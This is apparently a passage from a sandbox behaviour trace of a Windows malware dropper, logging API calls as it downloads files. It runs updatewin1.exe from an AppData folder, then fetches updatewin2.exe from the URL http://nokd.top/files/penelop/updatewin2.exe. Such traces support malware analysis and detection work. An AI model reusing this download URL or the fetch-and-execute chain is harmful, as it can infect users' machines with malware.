lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.415] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.421] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.422] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.423] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.424] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.452] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.452] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.453] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.453] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.454] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.454] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.463] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.464] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.465] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.467] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.486] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.495] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.495] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.496] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.497] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.514] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.519] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.519] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.519] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.520] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.520] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.521] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.521] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.522] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.523] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.525] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0xa00) returned 1 [0106.526] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0xa00, lpOverlapped=0x0) returned 1 [0106.527] CloseHandle (hObject=0x5f0) returned 1 [0106.546] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.553] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.567] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0109.726] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f070 | out: hHeap=0x730000) returned 1 [0109.726] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x336aeb0 | out: hHeap=0x730000) returned 1 [0109.726] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340ef0 | out: hHeap=0x730000) returned 1 [0109.726] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0109.726] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33247a8 [0109.726] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x3340d10 [0109.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33247a8, cbMultiByte=-1, lpWideCharStr=0x3340d10, cchWideChar=1072 | out: lpWideCharStr="http://nokd.top/files/penelop/updatewin2.exe") returned 45 [0109.727] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x870) returned 0x33926e8 [0109.727] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0109.727] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33247a8 | out: hHeap=0x730000) returned 1 [0109.727] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x870) returned 0x3340d10 [0109.727] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bf5aa8 [0109.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x9bf5aa8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0109.727] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bf6330 [0109.727] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5aa8 | out: hHeap=0x730000) returned 1 [0109.727] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0109.727] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://nokd.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0110.387] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf6330 | out: hHeap=0x730000) returned 1 [0110.387] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0110.387] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3324688 [0110.387] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33948d0 [0110.387] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3324688 | out: hHeap=0x730000) returned 1 [0110.387] lstrcpyA (in: lpString1=0x33337d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" [0110.388] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe") returned 1 [0110.388] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f418 [0110.388] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6dc [0110.388] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.388] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.395] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.396] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.699] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.699] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.700] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.700] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.701] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.701] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.738] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.739] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.742] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.742] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.743] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.744] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.744] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.745] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.745] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.746] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.779] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.780] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.780] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.781] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.782] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.783] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.783] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.788] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.788] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.789] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.789] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.794] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.794] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.818] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.819] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.822] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.827] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.828] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, 